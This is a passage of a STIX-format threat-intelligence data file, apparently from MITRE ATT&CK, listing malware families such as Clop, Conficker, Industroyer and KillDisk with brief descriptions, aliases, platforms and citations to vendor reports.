"id": "malware--cad3ba95-8c89-4146-ab10-08daa813f9de",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-10 23:19:38.608000+00:00",
"modified": "2021-10-15 00:18:17.636000+00:00",
"name": "Clop",
"description": "[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021) ",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0611",
"external_id": "S0611"
},
{
"source_name": "Clop",
"description": "(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)"
},
{
"source_name": "Mcafee Clop Aug 2019",
"description": "Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.",
"url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/"
},
{
"source_name": "Cybereason Clop Dec 2020",
"description": "Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.",
"url": "https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware"
},
{
"source_name": "Unit42 Clop April 2021",
"description": "Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.",
"url": "https://unit42.paloaltonetworks.com/clop-ransomware/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Clop"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-02-23 20:50:32.845000+00:00",
"modified": "2021-10-14 19:41:44.167000+00:00",
"name": "Conficker",
"description": "[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0608",
"external_id": "S0608"
},
{
"source_name": "Kido",
"description": "(Citation: SANS Conficker) "
},
{
"source_name": "Downadup",
"description": "(Citation: SANS Conficker) "
},
{
"source_name": "SANS Conficker",
"description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.",
"url": "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm"
},
{
"source_name": "Conficker Nuclear Power Plant",
"description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.",
"url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Conficker",
"Kido",
"Downadup"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--5d342981-5194-41e7-b33f-8e91998d7d88",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-05-24 15:56:18.522000+00:00",
"modified": "2021-10-15 23:10:53.785000+00:00",
"name": "CostaBricks",
"description": "[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0614",
"external_id": "S0614"
},
{
"source_name": "BlackBerry CostaRicto November 2020",
"description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.",
"url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"CostaBricks"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--6cd07296-14aa-403d-9229-6343d03d4752",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-18 22:05:58.411000+00:00",
"modified": "2021-10-12 21:13:50.228000+00:00",
"name": "Cuba",
"description": "\n[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0625",
"external_id": "S0625"
},
{
"source_name": "Cuba",
"description": "(Citation: McAfee Cuba April 2021)"
},
{
"source_name": "McAfee Cuba April 2021",
"description": "Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.",
"url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Cuba"
],
"x_mitre_contributors": [
"Daniyal Naeem, BT Security"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--6de9cad1-eed2-4e27-b0b5-39fa29349ea0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-02 15:48:55.838000+00:00",
"modified": "2021-10-18 18:28:24.079000+00:00",
"name": "DEATHRANSOM",
"description": "[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0616",
"external_id": "S0616"
},
{
"source_name": "FireEye FiveHands April 2021",
"description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"DEATHRANSOM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-02-12 20:07:42.883000+00:00",
"modified": "2021-10-13 21:54:51.532000+00:00",
"name": "EKANS",
"description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0605",
"external_id": "S0605"
},
{
"source_name": "EKANS",
"description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)"
},
{
"source_name": "SNAKEHOSE",
"description": "(Citation: FireEye Ransomware Feb 2020)"
},
{
"source_name": "Dragos EKANS",
"description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.",
"url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
},
{
"source_name": "Palo Alto Unit 42 EKANS",
"description": "Hinchliffe, A. Santos, D.. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.",
"url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/"
},
{
"source_name": "FireEye Ransomware Feb 2020",
"description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"EKANS",
"SNAKEHOSE"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--292eb0c5-b8e8-4af6-9e8f-0fda6b4528d3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-18 18:56:41.244000+00:00",
"modified": "2021-10-11 14:18:23.361000+00:00",
"name": "Ecipekac",
"description": "[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0624",
"external_id": "S0624"
},
{
"source_name": "HEAVYHAND",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "SigLoader",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "DESLoader",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "Securelist APT10 March 2021",
"description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
"url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Ecipekac",
"HEAVYHAND",
"SigLoader",
"DESLoader"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--2f8229dc-da94-41c6-89ba-b5b6c32f6b7d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-02 15:31:32.397000+00:00",
"modified": "2021-10-16 01:24:29.056000+00:00",
"name": "EnvyScout",
"description": "[EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0634",
"external_id": "S0634"
},
{
"source_name": "MSTIC Nobelium Toolset May 2021",
"description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.",
"url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"EnvyScout"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--f464354c-7103-47c6-969b-8766f0157ed2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-04 15:34:01.097000+00:00",
"modified": "2021-10-18 17:52:32.865000+00:00",
"name": "FIVEHANDS",
"description": "[FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0618",
"external_id": "S0618"
},
{
"source_name": "FireEye FiveHands April 2021",
"description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
},
{
"source_name": "NCC Group Fivehands June 2021",
"description": "Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.",
"url": "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"FIVEHANDS"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--434ba392-ebdc-488b-b1ef-518deea65774",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-22 14:20:30.164000+00:00",
"modified": "2021-10-11 15:57:36.797000+00:00",
"name": "FYAnti",
"description": "[FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0628",
"external_id": "S0628"
},
{
"source_name": "DILLJUICE stage2",
"description": "(Citation: Securelist APT10 March 2021)"
},
{
"source_name": "Securelist APT10 March 2021",
"description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
"url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"FYAnti",
"DILLJUICE stage2"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--c9b99d03-ff11-4a48-95f0-82660d582c25",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-07-16 18:19:25.986000+00:00",
"modified": "2021-10-15 16:15:20.371000+00:00",
"name": "GrimAgent",
"description": "[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0632",
"external_id": "S0632"
},
{
"source_name": "Group IB GrimAgent July 2021",
"description": "Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.",
"url": "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"GrimAgent"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--5d11d418-95dd-4377-b782-23160dfa17b4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-06-03 20:07:21.788000+00:00",
"modified": "2021-10-18 18:33:58.599000+00:00",
"name": "HELLOKITTY",
"description": "[HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0617",
"external_id": "S0617"
},
{
"source_name": "FireEye FiveHands April 2021",
"description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"HELLOKITTY"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-01-04 20:42:21.997000+00:00",
"modified": "2021-10-13 19:33:41.189000+00:00",
"name": "Industroyer",
"description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0604",
"external_id": "S0604"
},
{
"source_name": "CRASHOVERRIDE",
"description": "(Citation: Dragos Crashoverride 2017)"
},
{
"source_name": "Win32/Industroyer",
"description": "(Citation: ESET Industroyer)"
},
{
"source_name": "ESET Industroyer",
"description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.",
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf "
},
{
"source_name": "Dragos Crashoverride 2017",
"description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.",
"url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf "
},
{
"source_name": "Dragos Crashoverride 2018",
"description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
"url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf "
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Industroyer",
"CRASHOVERRIDE",
"Win32/Industroyer"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--f559f945-eb8b-48b1-904c-68568deebed3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-22 14:44:48.087000+00:00",
"modified": "2021-10-15 19:57:14.998000+00:00",
"name": "JSS Loader",
"description": "[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0648",
"external_id": "S0648"
},
{
"source_name": "eSentire FIN7 July 2021",
"description": "eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels\u2019 Owner, Brown-Forman Inc.. Retrieved September 20, 2021.",
"url": "https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc"
},
{
"source_name": "CrowdStrike Carbon Spider August 2021",
"description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.",
"url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"JSS Loader"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-01-20 18:05:07.059000+00:00",
"modified": "2021-10-14 14:18:07.086000+00:00",
"name": "KillDisk",
"description": "[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0607",
"external_id": "S0607"
},
{
"source_name": "KillDisk Ransomware",
"description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.",
"url": "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/"
},
{
"source_name": "ESEST Black Energy Jan 2016",
"description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.",
"url": "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
},
{
"source_name": "Trend Micro KillDisk 1",
"description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.",
"url": "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html"
},
{
"source_name": "Trend Micro KillDisk 2",
"description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.",
"url": "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"KillDisk",
"Win32/KillDisk.NBI",
"Win32/KillDisk.NBH",
"Win32/KillDisk.NBD",
"Win32/KillDisk.NBC",
"Win32/KillDisk.NBB"
],
"x_mitre_platforms": [
"Linux",
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--9abdda30-08e0-4ab1-9cf0-d447654c6de9",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-24 18:56:35.507000+00:00",
"modified": "2021-10-19 00:09:52.008000+00:00",
"name": "Kobalos",
"description": "[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0641",
"external_id": "S0641"
},
{
"source_name": "Kobalos",
"description": "(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)"
},
{
"source_name": "ESET Kobalos Feb 2021",
"description": "M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos \u2013 A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.",
"url": "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/"
},
{
"source_name": "ESET Kobalos Jan 2021",
"description": "M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.",
"url": "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"Kobalos"
],
"x_mitre_platforms": [
"Linux"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--95e2cbae-d82c-4f7b-b63c-16462015d35d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-09-24 17:51:35.005000+00:00",
"modified": "2021-10-04 15:34:14.458000+00:00",
"name": "LiteDuke",
"description": "[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0513",
"external_id": "S0513"
},
{
"source_name": "ESET Dukes October 2019",
"description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.",
"url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"LiteDuke"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--532c6004-b1e8-415b-9516-f7c14ba783b1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-09-28 17:48:36.547000+00:00",
"modified": "2021-10-15 17:18:54.363000+00:00",
"name": "MarkiRAT",
"description": "[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0652",
"external_id": "S0652"
},
{
"source_name": "Kaspersky Ferocious Kitten Jun 2021",
"description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.",
"url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_aliases": [
"MarkiRAT"
],
"x_mitre_contributors": [
"Pooja Natarajan, NEC Corporation India",
"Manikantan Srinivasan, NEC Corporation India",
"Nagahama Hiroki, NEC Corporation"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.0"
},
{
"type": "malware",
"id": "malware--b4783be3-35d9-4a56-ac8d-1f3e1c9d9a84",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2021-08-04 19:36:55.518000+00:00",
"modified": "2021-10-16 02:03:14.543000+00:00",
"name": "NativeZone",
"description": "[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)",
"revoked": false,
"labels": [
"malware"
],
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0637",
"external_id": "S0637"
},
{
"source_name": "MSTIC Nobelium Toolset May 2021",
"description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.",
